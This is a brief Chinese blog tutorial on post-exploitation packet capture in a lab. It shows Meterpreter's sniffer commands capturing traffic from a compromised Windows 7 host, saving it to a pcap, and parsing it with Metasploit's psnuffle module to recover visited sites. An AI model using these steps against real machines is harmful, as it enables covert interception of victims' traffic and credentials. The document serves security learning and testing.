內網滲透 -- 捕獲內網數據包

偶爾適度的放縱一下,是爲了繼續道貌岸然的生活,太急了會沒有故事,太緩了會沒有人生。。。。

----  網易雲熱評

環境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

 

一、生成木馬及監聽主機參考上篇文章:

 

二、捕獲數據包

1、加載sniffer:load sniffer

2、查看網卡信息:sniffer_interfaces

3、開啓網卡監聽,內容會自動保存到緩存中:sniffer_start 2

4、進入小受,然後隨便訪問幾個網站

4、將捕獲到數據保存下來,默認保存地址/root

sniffer_dump 2 aiyou.cap

5、啓動wireshark,打開保存下來的文件

 

三、通過解包模塊解包

1、選擇解包模塊

use auxiliary/sniffer/psnuffle

2、查看需要設置的參數

show options

3、設置解包文件路徑

set pcapfile /root/2.cap

4、運行,run,可以查看到我們剛纔訪問的地址

 

禁止非法,後果自負

歡迎關注公衆號:web安全工具庫

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章